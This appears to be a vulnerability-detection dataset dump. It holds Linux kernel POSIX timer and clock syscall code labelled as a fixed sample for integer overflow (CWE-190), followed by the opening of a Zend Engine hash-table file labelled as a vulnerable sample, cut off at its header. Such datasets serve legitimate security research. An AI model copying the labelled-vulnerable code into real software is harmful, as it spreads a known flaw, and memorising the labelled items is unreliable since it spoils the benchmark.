static int posix_ktime_get_ts(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_ts64(tp);
return 0;
}
/*
* Get monotonic-raw time for posix timers
*/
static int posix_get_monotonic_raw(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_raw_ts64(tp);
return 0;
}
static int posix_get_realtime_coarse(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_coarse_real_ts64(tp);
return 0;
}
static int posix_get_monotonic_coarse(clockid_t which_clock,
struct timespec64 *tp)
{
ktime_get_coarse_ts64(tp);
return 0;
}
static int posix_get_coarse_res(const clockid_t which_clock, struct timespec64 *tp)
{
*tp = ktime_to_timespec64(KTIME_LOW_RES);
return 0;
}
static int posix_get_boottime(const clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_boottime_ts64(tp);
return 0;
}
static int posix_get_tai(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_clocktai_ts64(tp);
return 0;
}
static int posix_get_hrtimer_res(clockid_t which_clock, struct timespec64 *tp)
{
tp->tv_sec = 0;
tp->tv_nsec = hrtimer_resolution;
return 0;
}
/*
* Initialize everything, well, just everything in Posix clocks/timers ;)
*/
static __init int init_posix_timers(void)
{
posix_timers_cache = kmem_cache_create("posix_timers_cache",
sizeof (struct k_itimer), 0, SLAB_PANIC,
NULL);
return 0;
}
__initcall(init_posix_timers);
/*
* The siginfo si_overrun field and the return value of timer_getoverrun(2)
* are of type int. Clamp the overrun value to INT_MAX
*/
static inline int timer_overrun_to_int(struct k_itimer *timr, int baseval)
{
s64 sum = timr->it_overrun_last + (s64)baseval;
return sum > (s64)INT_MAX ? INT_MAX : (int)sum;
}
static void common_hrtimer_rearm(struct k_itimer *timr)
{
struct hrtimer *timer = &timr->it.real.timer;
if (!timr->it_interval)
return;
timr->it_overrun += hrtimer_forward(timer, timer->base->get_time(),
timr->it_interval);
hrtimer_restart(timer);
}
/*
* This function is exported for use by the signal deliver code. It is
* called just prior to the info block being released and passes that
* block to us. It's function is to update the overrun entry AND to
* restart the timer. It should only be called if the timer is to be
* restarted (i.e. we have flagged this in the sys_private entry of the
* info block).
*
* To protect against the timer going away while the interrupt is queued,
* we require that the it_requeue_pending flag be set.
*/
void posixtimer_rearm(struct siginfo *info)
{
struct k_itimer *timr;
unsigned long flags;
timr = lock_timer(info->si_tid, &flags);
if (!timr)
return;
if (timr->it_requeue_pending == info->si_sys_private) {
timr->kclock->timer_rearm(timr);
timr->it_active = 1;
timr->it_overrun_last = timr->it_overrun;
timr->it_overrun = -1LL;
++timr->it_requeue_pending;
info->si_overrun = timer_overrun_to_int(timr, info->si_overrun);
}
unlock_timer(timr, flags);
}
int posix_timer_event(struct k_itimer *timr, int si_private)
{
struct task_struct *task;
int shared, ret = -1;
/*
* FIXME: if ->sigq is queued we can race with
* dequeue_signal()->posixtimer_rearm().
*
* If dequeue_signal() sees the "right" value of
* si_sys_private it calls posixtimer_rearm().
* We re-queue ->sigq and drop ->it_lock().
* posixtimer_rearm() locks the timer
* and re-schedules it while ->sigq is pending.
* Not really bad, but not that we want.
*/
timr->sigq->info.si_sys_private = si_private;
rcu_read_lock();
task = pid_task(timr->it_pid, PIDTYPE_PID);
if (task) {
shared = !(timr->it_sigev_notify & SIGEV_THREAD_ID);
ret = send_sigqueue(timr->sigq, task, shared);
}
rcu_read_unlock();
/* If we failed to send the signal the timer stops. */
return ret > 0;
}
/*
* This function gets called when a POSIX.1b interval timer expires. It
* is used as a callback from the kernel internal timer. The
* run_timer_list code ALWAYS calls with interrupts on.
* This code is for CLOCK_REALTIME* and CLOCK_MONOTONIC* timers.
*/
static enum hrtimer_restart posix_timer_fn(struct hrtimer *timer)
{
struct k_itimer *timr;
unsigned long flags;
int si_private = 0;
enum hrtimer_restart ret = HRTIMER_NORESTART;
timr = container_of(timer, struct k_itimer, it.real.timer);
spin_lock_irqsave(&timr->it_lock, flags);
timr->it_active = 0;
if (timr->it_interval != 0)
si_private = ++timr->it_requeue_pending;
if (posix_timer_event(timr, si_private)) {
/*
* signal was not sent because of sig_ignor
* we will not get a call back to restart it AND
* it should be restarted.
*/
if (timr->it_interval != 0) {
ktime_t now = hrtimer_cb_get_time(timer);
/*
* FIXME: What we really want, is to stop this
* timer completely and restart it in case the
* SIG_IGN is removed. This is a non trivial
* change which involves sighand locking
* (sigh !), which we don't want to do late in
* the release cycle.
*
* For now we just let timers with an interval
* less than a jiffie expire every jiffie to
* avoid softirq starvation in case of SIG_IGN
* and a very small interval, which would put
* the timer right back on the softirq pending
* list. By moving now ahead of time we trick
* hrtimer_forward() to expire the timer
* later, while we still maintain the overrun
* accuracy, but have some inconsistency in
* the timer_gettime() case. This is at least
* better than a starved softirq. A more
* complex fix which solves also another related
* inconsistency is already in the pipeline.
*/
#ifdef CONFIG_HIGH_RES_TIMERS
{
ktime_t kj = NSEC_PER_SEC / HZ;
if (timr->it_interval < kj)
now = ktime_add(now, kj);
}
#endif
timr->it_overrun += hrtimer_forward(timer, now,
timr->it_interval);
ret = HRTIMER_RESTART;
++timr->it_requeue_pending;
timr->it_active = 1;
}
}
unlock_timer(timr, flags);
return ret;
}
static struct pid *good_sigevent(sigevent_t * event)
{
struct task_struct *rtn = current->group_leader;
switch (event->sigev_notify) {
case SIGEV_SIGNAL | SIGEV_THREAD_ID:
rtn = find_task_by_vpid(event->sigev_notify_thread_id);
if (!rtn || !same_thread_group(rtn, current))
return NULL;
/* FALLTHRU */
case SIGEV_SIGNAL:
case SIGEV_THREAD:
if (event->sigev_signo <= 0 || event->sigev_signo > SIGRTMAX)
return NULL;
/* FALLTHRU */
case SIGEV_NONE:
return task_pid(rtn);
default:
return NULL;
}
}
static struct k_itimer * alloc_posix_timer(void)
{
struct k_itimer *tmr;
tmr = kmem_cache_zalloc(posix_timers_cache, GFP_KERNEL);
if (!tmr)
return tmr;
if (unlikely(!(tmr->sigq = sigqueue_alloc()))) {
kmem_cache_free(posix_timers_cache, tmr);
return NULL;
}
clear_siginfo(&tmr->sigq->info);
return tmr;
}
static void k_itimer_rcu_free(struct rcu_head *head)
{
struct k_itimer *tmr = container_of(head, struct k_itimer, it.rcu);
kmem_cache_free(posix_timers_cache, tmr);
}
#define IT_ID_SET 1
#define IT_ID_NOT_SET 0
static void release_posix_timer(struct k_itimer *tmr, int it_id_set)
{
if (it_id_set) {
unsigned long flags;
spin_lock_irqsave(&hash_lock, flags);
hlist_del_rcu(&tmr->t_hash);
spin_unlock_irqrestore(&hash_lock, flags);
}
put_pid(tmr->it_pid);
sigqueue_free(tmr->sigq);
call_rcu(&tmr->it.rcu, k_itimer_rcu_free);
}
static int common_timer_create(struct k_itimer *new_timer)
{
hrtimer_init(&new_timer->it.real.timer, new_timer->it_clock, 0);
return 0;
}
/* Create a POSIX.1b interval timer. */
static int do_timer_create(clockid_t which_clock, struct sigevent *event,
timer_t __user *created_timer_id)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct k_itimer *new_timer;
int error, new_timer_id;
int it_id_set = IT_ID_NOT_SET;
if (!kc)
return -EINVAL;
if (!kc->timer_create)
return -EOPNOTSUPP;
new_timer = alloc_posix_timer();
if (unlikely(!new_timer))
return -EAGAIN;
spin_lock_init(&new_timer->it_lock);
new_timer_id = posix_timer_add(new_timer);
if (new_timer_id < 0) {
error = new_timer_id;
goto out;
}
it_id_set = IT_ID_SET;
new_timer->it_id = (timer_t) new_timer_id;
new_timer->it_clock = which_clock;
new_timer->kclock = kc;
new_timer->it_overrun = -1LL;
if (event) {
rcu_read_lock();
new_timer->it_pid = get_pid(good_sigevent(event));
rcu_read_unlock();
if (!new_timer->it_pid) {
error = -EINVAL;
goto out;
}
new_timer->it_sigev_notify = event->sigev_notify;
new_timer->sigq->info.si_signo = event->sigev_signo;
new_timer->sigq->info.si_value = event->sigev_value;
} else {
new_timer->it_sigev_notify = SIGEV_SIGNAL;
new_timer->sigq->info.si_signo = SIGALRM;
memset(&new_timer->sigq->info.si_value, 0, sizeof(sigval_t));
new_timer->sigq->info.si_value.sival_int = new_timer->it_id;
new_timer->it_pid = get_pid(task_tgid(current));
}
new_timer->sigq->info.si_tid = new_timer->it_id;
new_timer->sigq->info.si_code = SI_TIMER;
if (copy_to_user(created_timer_id,
&new_timer_id, sizeof (new_timer_id))) {
error = -EFAULT;
goto out;
}
error = kc->timer_create(new_timer);
if (error)
goto out;
	spin_lock_irq(&current->sighand->siglock);
	new_timer->it_signal = current->signal;
	list_add(&new_timer->list, &current->signal->posix_timers);
	spin_unlock_irq(&current->sighand->siglock);
return 0;
/*
* In the case of the timer belonging to another task, after
* the task is unlocked, the timer is owned by the other task
* and may cease to exist at any time. Don't use or modify
* new_timer after the unlock call.
*/
out:
release_posix_timer(new_timer, it_id_set);
return error;
}
SYSCALL_DEFINE3(timer_create, const clockid_t, which_clock,
struct sigevent __user *, timer_event_spec,
timer_t __user *, created_timer_id)
{
if (timer_event_spec) {
sigevent_t event;
if (copy_from_user(&event, timer_event_spec, sizeof (event)))
return -EFAULT;
return do_timer_create(which_clock, &event, created_timer_id);
}
return do_timer_create(which_clock, NULL, created_timer_id);
}
#ifdef CONFIG_COMPAT
COMPAT_SYSCALL_DEFINE3(timer_create, clockid_t, which_clock,
struct compat_sigevent __user *, timer_event_spec,
timer_t __user *, created_timer_id)
{
if (timer_event_spec) {
sigevent_t event;
if (get_compat_sigevent(&event, timer_event_spec))
return -EFAULT;
return do_timer_create(which_clock, &event, created_timer_id);
}
return do_timer_create(which_clock, NULL, created_timer_id);
}
#endif
/*
* Locking issues: We need to protect the result of the id look up until
* we get the timer locked down so it is not deleted under us. The
* removal is done under the idr spinlock so we use that here to bridge
* the find to the timer lock. To avoid a dead lock, the timer id MUST
* be release with out holding the timer lock.
*/
static struct k_itimer *__lock_timer(timer_t timer_id, unsigned long *flags)
{
struct k_itimer *timr;
/*
* timer_t could be any type >= int and we want to make sure any
* @timer_id outside positive int range fails lookup.
*/
if ((unsigned long long)timer_id > INT_MAX)
return NULL;
rcu_read_lock();
timr = posix_timer_by_id(timer_id);
if (timr) {
spin_lock_irqsave(&timr->it_lock, *flags);
if (timr->it_signal == current->signal) {
rcu_read_unlock();
return timr;
}
spin_unlock_irqrestore(&timr->it_lock, *flags);
}
rcu_read_unlock();
return NULL;
}
static ktime_t common_hrtimer_remaining(struct k_itimer *timr, ktime_t now)
{
struct hrtimer *timer = &timr->it.real.timer;
return __hrtimer_expires_remaining_adjusted(timer, now);
}
static s64 common_hrtimer_forward(struct k_itimer *timr, ktime_t now)
{
struct hrtimer *timer = &timr->it.real.timer;
return hrtimer_forward(timer, now, timr->it_interval);
}
/*
* Get the time remaining on a POSIX.1b interval timer. This function
* is ALWAYS called with spin_lock_irq on the timer, thus it must not
* mess with irq.
*
* We have a couple of messes to clean up here. First there is the case
* of a timer that has a requeue pending. These timers should appear to
* be in the timer list with an expiry as if we were to requeue them
* now.
*
* The second issue is the SIGEV_NONE timer which may be active but is
* not really ever put in the timer list (to save system resources).
* This timer may be expired, and if so, we will do it here. Otherwise
* it is the same as a requeue pending timer WRT to what we should
* report.
*/
void common_timer_get(struct k_itimer *timr, struct itimerspec64 *cur_setting)
{
const struct k_clock *kc = timr->kclock;
ktime_t now, remaining, iv;
struct timespec64 ts64;
bool sig_none;
sig_none = timr->it_sigev_notify == SIGEV_NONE;
iv = timr->it_interval;
/* interval timer ? */
if (iv) {
cur_setting->it_interval = ktime_to_timespec64(iv);
} else if (!timr->it_active) {
/*
* SIGEV_NONE oneshot timers are never queued. Check them
* below.
*/
if (!sig_none)
return;
}
/*
* The timespec64 based conversion is suboptimal, but it's not
* worth to implement yet another callback.
*/
kc->clock_get(timr->it_clock, &ts64);
now = timespec64_to_ktime(ts64);
/*
* When a requeue is pending or this is a SIGEV_NONE timer move the
* expiry time forward by intervals, so expiry is > now.
*/
if (iv && (timr->it_requeue_pending & REQUEUE_PENDING || sig_none))
timr->it_overrun += kc->timer_forward(timr, now);
remaining = kc->timer_remaining(timr, now);
/* Return 0 only, when the timer is expired and not pending */
if (remaining <= 0) {
/*
* A single shot SIGEV_NONE timer must return 0, when
* it is expired !
*/
if (!sig_none)
cur_setting->it_value.tv_nsec = 1;
} else {
cur_setting->it_value = ktime_to_timespec64(remaining);
}
}
/* Get the time remaining on a POSIX.1b interval timer. */
static int do_timer_gettime(timer_t timer_id, struct itimerspec64 *setting)
{
struct k_itimer *timr;
const struct k_clock *kc;
unsigned long flags;
int ret = 0;
timr = lock_timer(timer_id, &flags);
if (!timr)
return -EINVAL;
memset(setting, 0, sizeof(*setting));
kc = timr->kclock;
if (WARN_ON_ONCE(!kc || !kc->timer_get))
ret = -EINVAL;
else
kc->timer_get(timr, setting);
unlock_timer(timr, flags);
return ret;
}
/* Get the time remaining on a POSIX.1b interval timer. */
SYSCALL_DEFINE2(timer_gettime, timer_t, timer_id,
struct __kernel_itimerspec __user *, setting)
{
struct itimerspec64 cur_setting;
int ret = do_timer_gettime(timer_id, &cur_setting);
if (!ret) {
if (put_itimerspec64(&cur_setting, setting))
ret = -EFAULT;
}
return ret;
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE2(timer_gettime, timer_t, timer_id,
struct compat_itimerspec __user *, setting)
{
struct itimerspec64 cur_setting;
int ret = do_timer_gettime(timer_id, &cur_setting);
if (!ret) {
if (put_compat_itimerspec64(&cur_setting, setting))
ret = -EFAULT;
}
return ret;
}
#endif
/*
* Get the number of overruns of a POSIX.1b interval timer. This is to
* be the overrun of the timer last delivered. At the same time we are
* accumulating overruns on the next timer. The overrun is frozen when
* the signal is delivered, either at the notify time (if the info block
* is not queued) or at the actual delivery time (as we are informed by
* the call back to posixtimer_rearm(). So all we need to do is
* to pick up the frozen overrun.
*/
SYSCALL_DEFINE1(timer_getoverrun, timer_t, timer_id)
{
struct k_itimer *timr;
int overrun;
unsigned long flags;
timr = lock_timer(timer_id, &flags);
if (!timr)
return -EINVAL;
overrun = timer_overrun_to_int(timr, 0);
unlock_timer(timr, flags);
return overrun;
}
static void common_hrtimer_arm(struct k_itimer *timr, ktime_t expires,
bool absolute, bool sigev_none)
{
struct hrtimer *timer = &timr->it.real.timer;
enum hrtimer_mode mode;
mode = absolute ? HRTIMER_MODE_ABS : HRTIMER_MODE_REL;
/*
* Posix magic: Relative CLOCK_REALTIME timers are not affected by
* clock modifications, so they become CLOCK_MONOTONIC based under the
* hood. See hrtimer_init(). Update timr->kclock, so the generic
* functions which use timr->kclock->clock_get() work.
*
* Note: it_clock stays unmodified, because the next timer_set() might
* use ABSTIME, so it needs to switch back.
*/
if (timr->it_clock == CLOCK_REALTIME)
timr->kclock = absolute ? &clock_realtime : &clock_monotonic;
hrtimer_init(&timr->it.real.timer, timr->it_clock, mode);
timr->it.real.timer.function = posix_timer_fn;
if (!absolute)
expires = ktime_add_safe(expires, timer->base->get_time());
hrtimer_set_expires(timer, expires);
if (!sigev_none)
hrtimer_start_expires(timer, HRTIMER_MODE_ABS);
}
static int common_hrtimer_try_to_cancel(struct k_itimer *timr)
{
return hrtimer_try_to_cancel(&timr->it.real.timer);
}
/* Set a POSIX.1b interval timer. */
int common_timer_set(struct k_itimer *timr, int flags,
struct itimerspec64 *new_setting,
struct itimerspec64 *old_setting)
{
const struct k_clock *kc = timr->kclock;
bool sigev_none;
ktime_t expires;
if (old_setting)
common_timer_get(timr, old_setting);
/* Prevent rearming by clearing the interval */
timr->it_interval = 0;
/*
* Careful here. On SMP systems the timer expiry function could be
* active and spinning on timr->it_lock.
*/
if (kc->timer_try_to_cancel(timr) < 0)
return TIMER_RETRY;
timr->it_active = 0;
timr->it_requeue_pending = (timr->it_requeue_pending + 2) &
~REQUEUE_PENDING;
timr->it_overrun_last = 0;
/* Switch off the timer when it_value is zero */
if (!new_setting->it_value.tv_sec && !new_setting->it_value.tv_nsec)
return 0;
timr->it_interval = timespec64_to_ktime(new_setting->it_interval);
expires = timespec64_to_ktime(new_setting->it_value);
sigev_none = timr->it_sigev_notify == SIGEV_NONE;
kc->timer_arm(timr, expires, flags & TIMER_ABSTIME, sigev_none);
timr->it_active = !sigev_none;
return 0;
}
static int do_timer_settime(timer_t timer_id, int flags,
struct itimerspec64 *new_spec64,
struct itimerspec64 *old_spec64)
{
const struct k_clock *kc;
struct k_itimer *timr;
unsigned long flag;
int error = 0;
if (!timespec64_valid(&new_spec64->it_interval) ||
!timespec64_valid(&new_spec64->it_value))
return -EINVAL;
if (old_spec64)
memset(old_spec64, 0, sizeof(*old_spec64));
retry:
timr = lock_timer(timer_id, &flag);
if (!timr)
return -EINVAL;
kc = timr->kclock;
if (WARN_ON_ONCE(!kc || !kc->timer_set))
error = -EINVAL;
else
error = kc->timer_set(timr, flags, new_spec64, old_spec64);
unlock_timer(timr, flag);
if (error == TIMER_RETRY) {
old_spec64 = NULL; // We already got the old time...
goto retry;
}
return error;
}
/* Set a POSIX.1b interval timer */
SYSCALL_DEFINE4(timer_settime, timer_t, timer_id, int, flags,
const struct __kernel_itimerspec __user *, new_setting,
struct __kernel_itimerspec __user *, old_setting)
{
struct itimerspec64 new_spec, old_spec;
struct itimerspec64 *rtn = old_setting ? &old_spec : NULL;
int error = 0;
if (!new_setting)
return -EINVAL;
if (get_itimerspec64(&new_spec, new_setting))
return -EFAULT;
error = do_timer_settime(timer_id, flags, &new_spec, rtn);
if (!error && old_setting) {
if (put_itimerspec64(&old_spec, old_setting))
error = -EFAULT;
}
return error;
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE4(timer_settime, timer_t, timer_id, int, flags,
struct compat_itimerspec __user *, new,
struct compat_itimerspec __user *, old)
{
struct itimerspec64 new_spec, old_spec;
struct itimerspec64 *rtn = old ? &old_spec : NULL;
int error = 0;
if (!new)
return -EINVAL;
if (get_compat_itimerspec64(&new_spec, new))
return -EFAULT;
error = do_timer_settime(timer_id, flags, &new_spec, rtn);
if (!error && old) {
if (put_compat_itimerspec64(&old_spec, old))
error = -EFAULT;
}
return error;
}
#endif
int common_timer_del(struct k_itimer *timer)
{
const struct k_clock *kc = timer->kclock;
timer->it_interval = 0;
if (kc->timer_try_to_cancel(timer) < 0)
return TIMER_RETRY;
timer->it_active = 0;
return 0;
}
static inline int timer_delete_hook(struct k_itimer *timer)
{
const struct k_clock *kc = timer->kclock;
if (WARN_ON_ONCE(!kc || !kc->timer_del))
return -EINVAL;
return kc->timer_del(timer);
}
/* Delete a POSIX.1b interval timer. */
SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
struct k_itimer *timer;
unsigned long flags;
retry_delete:
timer = lock_timer(timer_id, &flags);
if (!timer)
return -EINVAL;
if (timer_delete_hook(timer) == TIMER_RETRY) {
unlock_timer(timer, flags);
goto retry_delete;
}
	spin_lock(&current->sighand->siglock);
list_del(&timer->list);
	spin_unlock(&current->sighand->siglock);
/*
* This keeps any tasks waiting on the spin lock from thinking
* they got something (see the lock code above).
*/
timer->it_signal = NULL;
unlock_timer(timer, flags);
release_posix_timer(timer, IT_ID_SET);
return 0;
}
/*
* return timer owned by the process, used by exit_itimers
*/
static void itimer_delete(struct k_itimer *timer)
{
unsigned long flags;
retry_delete:
spin_lock_irqsave(&timer->it_lock, flags);
if (timer_delete_hook(timer) == TIMER_RETRY) {
unlock_timer(timer, flags);
goto retry_delete;
}
list_del(&timer->list);
/*
* This keeps any tasks waiting on the spin lock from thinking
* they got something (see the lock code above).
*/
timer->it_signal = NULL;
unlock_timer(timer, flags);
release_posix_timer(timer, IT_ID_SET);
}
/*
* This is called by do_exit or de_thread, only when there are no more
* references to the shared signal_struct.
*/
void exit_itimers(struct signal_struct *sig)
{
struct k_itimer *tmr;
while (!list_empty(&sig->posix_timers)) {
tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
itimer_delete(tmr);
}
}
SYSCALL_DEFINE2(clock_settime, const clockid_t, which_clock,
const struct __kernel_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 new_tp;
if (!kc || !kc->clock_set)
return -EINVAL;
if (get_timespec64(&new_tp, tp))
return -EFAULT;
return kc->clock_set(which_clock, &new_tp);
}
SYSCALL_DEFINE2(clock_gettime, const clockid_t, which_clock,
struct __kernel_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 kernel_tp;
int error;
if (!kc)
return -EINVAL;
error = kc->clock_get(which_clock, &kernel_tp);
if (!error && put_timespec64(&kernel_tp, tp))
error = -EFAULT;
return error;
}
SYSCALL_DEFINE2(clock_adjtime, const clockid_t, which_clock,
struct timex __user *, utx)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timex ktx;
int err;
if (!kc)
return -EINVAL;
if (!kc->clock_adj)
return -EOPNOTSUPP;
if (copy_from_user(&ktx, utx, sizeof(ktx)))
return -EFAULT;
err = kc->clock_adj(which_clock, &ktx);
if (err >= 0 && copy_to_user(utx, &ktx, sizeof(ktx)))
return -EFAULT;
return err;
}
SYSCALL_DEFINE2(clock_getres, const clockid_t, which_clock,
struct __kernel_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 rtn_tp;
int error;
if (!kc)
return -EINVAL;
error = kc->clock_getres(which_clock, &rtn_tp);
if (!error && tp && put_timespec64(&rtn_tp, tp))
error = -EFAULT;
return error;
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE2(clock_settime, clockid_t, which_clock,
struct compat_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 ts;
if (!kc || !kc->clock_set)
return -EINVAL;
if (compat_get_timespec64(&ts, tp))
return -EFAULT;
return kc->clock_set(which_clock, &ts);
}
COMPAT_SYSCALL_DEFINE2(clock_gettime, clockid_t, which_clock,
struct compat_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 ts;
int err;
if (!kc)
return -EINVAL;
err = kc->clock_get(which_clock, &ts);
if (!err && compat_put_timespec64(&ts, tp))
err = -EFAULT;
return err;
}
#endif
#ifdef CONFIG_COMPAT
COMPAT_SYSCALL_DEFINE2(clock_adjtime, clockid_t, which_clock,
struct compat_timex __user *, utp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timex ktx;
int err;
if (!kc)
return -EINVAL;
if (!kc->clock_adj)
return -EOPNOTSUPP;
err = compat_get_timex(&ktx, utp);
if (err)
return err;
err = kc->clock_adj(which_clock, &ktx);
if (err >= 0)
err = compat_put_timex(utp, &ktx);
return err;
}
#endif
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE2(clock_getres, clockid_t, which_clock,
struct compat_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 ts;
int err;
if (!kc)
return -EINVAL;
err = kc->clock_getres(which_clock, &ts);
if (!err && tp && compat_put_timespec64(&ts, tp))
return -EFAULT;
return err;
}
#endif
/*
* nanosleep for monotonic and realtime clocks
*/
static int common_nsleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
return hrtimer_nanosleep(rqtp, flags & TIMER_ABSTIME ?
HRTIMER_MODE_ABS : HRTIMER_MODE_REL,
which_clock);
}
SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
const struct __kernel_timespec __user *, rqtp,
struct __kernel_timespec __user *, rmtp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 t;
if (!kc)
return -EINVAL;
if (!kc->nsleep)
return -ENANOSLEEP_NOTSUP;
if (get_timespec64(&t, rqtp))
return -EFAULT;
if (!timespec64_valid(&t))
return -EINVAL;
if (flags & TIMER_ABSTIME)
rmtp = NULL;
current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
current->restart_block.nanosleep.rmtp = rmtp;
return kc->nsleep(which_clock, flags, &t);
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE4(clock_nanosleep, clockid_t, which_clock, int, flags,
struct compat_timespec __user *, rqtp,
struct compat_timespec __user *, rmtp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 t;
if (!kc)
return -EINVAL;
if (!kc->nsleep)
return -ENANOSLEEP_NOTSUP;
if (compat_get_timespec64(&t, rqtp))
return -EFAULT;
if (!timespec64_valid(&t))
return -EINVAL;
if (flags & TIMER_ABSTIME)
rmtp = NULL;
current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
current->restart_block.nanosleep.compat_rmtp = rmtp;
return kc->nsleep(which_clock, flags, &t);
}
#endif
static const struct k_clock clock_realtime = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_clock_realtime_get,
.clock_set = posix_clock_realtime_set,
.clock_adj = posix_clock_realtime_adj,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock clock_monotonic = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_ktime_get_ts,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock clock_monotonic_raw = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_get_monotonic_raw,
};
static const struct k_clock clock_realtime_coarse = {
.clock_getres = posix_get_coarse_res,
.clock_get = posix_get_realtime_coarse,
};
static const struct k_clock clock_monotonic_coarse = {
.clock_getres = posix_get_coarse_res,
.clock_get = posix_get_monotonic_coarse,
};
static const struct k_clock clock_tai = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_get_tai,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock clock_boottime = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_get_boottime,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock * const posix_clocks[] = {
[CLOCK_REALTIME] = &clock_realtime,
[CLOCK_MONOTONIC] = &clock_monotonic,
[CLOCK_PROCESS_CPUTIME_ID] = &clock_process,
[CLOCK_THREAD_CPUTIME_ID] = &clock_thread,
[CLOCK_MONOTONIC_RAW] = &clock_monotonic_raw,
[CLOCK_REALTIME_COARSE] = &clock_realtime_coarse,
[CLOCK_MONOTONIC_COARSE] = &clock_monotonic_coarse,
[CLOCK_BOOTTIME] = &clock_boottime,
[CLOCK_REALTIME_ALARM] = &alarm_clock,
[CLOCK_BOOTTIME_ALARM] = &alarm_clock,
[CLOCK_TAI] = &clock_tai,
};
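/*
 * Resolve a clockid to its k_clock ops.  Negative ids encode either a
 * fd-based dynamic posix clock or a per-process/per-thread CPU clock;
 * non-negative ids index posix_clocks[], with array_index_nospec()
 * clamping the index against speculative out-of-bounds access.
 */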
static const struct k_clock *clockid_to_kclock(const clockid_t id)
{
clockid_t idx = id;
if (id < 0) {
return (id & CLOCKFD_MASK) == CLOCKFD ?
&clock_posix_dynamic : &clock_posix_cpu;
}
if (id >= ARRAY_SIZE(posix_clocks))
return NULL;
return posix_clocks[array_index_nospec(idx, ARRAY_SIZE(posix_clocks))];
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_207_2 |
crossvul-cpp_data_bad_3089_0 | /*
+----------------------------------------------------------------------+
| Zend Engine |
+----------------------------------------------------------------------+
| Copyright (c) 1998-2016 Zend Technologies Ltd. (http://www.zend.com) |
+----------------------------------------------------------------------+
| This source file is subject to version 2.00 of the Zend license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.zend.com/license/2_00.txt. |
| If you did not receive a copy of the Zend license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@zend.com so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Authors: Andi Gutmans <andi@zend.com> |
| Zeev Suraski <zeev@zend.com> |
| Dmitry Stogov <dmitry@zend.com> |
+----------------------------------------------------------------------+
*/
/* $Id$ */
#include "zend.h"
#include "zend_globals.h"
#include "zend_variables.h"
#define HT_DEBUG 0
#if HT_DEBUG
# define HT_ASSERT(c) ZEND_ASSERT(c)
#else
# define HT_ASSERT(c)
#endif
#define HT_POISONED_PTR ((HashTable *) (intptr_t) -1)
#if ZEND_DEBUG
/*
#define HASH_MASK_CONSISTENCY 0xc0
*/
#define HT_OK 0x00
#define HT_IS_DESTROYING 0x40
#define HT_DESTROYED 0x80
#define HT_CLEANING 0xc0
static void _zend_is_inconsistent(const HashTable *ht, const char *file, int line)
{
if ((ht->u.flags & HASH_MASK_CONSISTENCY) == HT_OK) {
return;
}
switch ((ht->u.flags & HASH_MASK_CONSISTENCY)) {
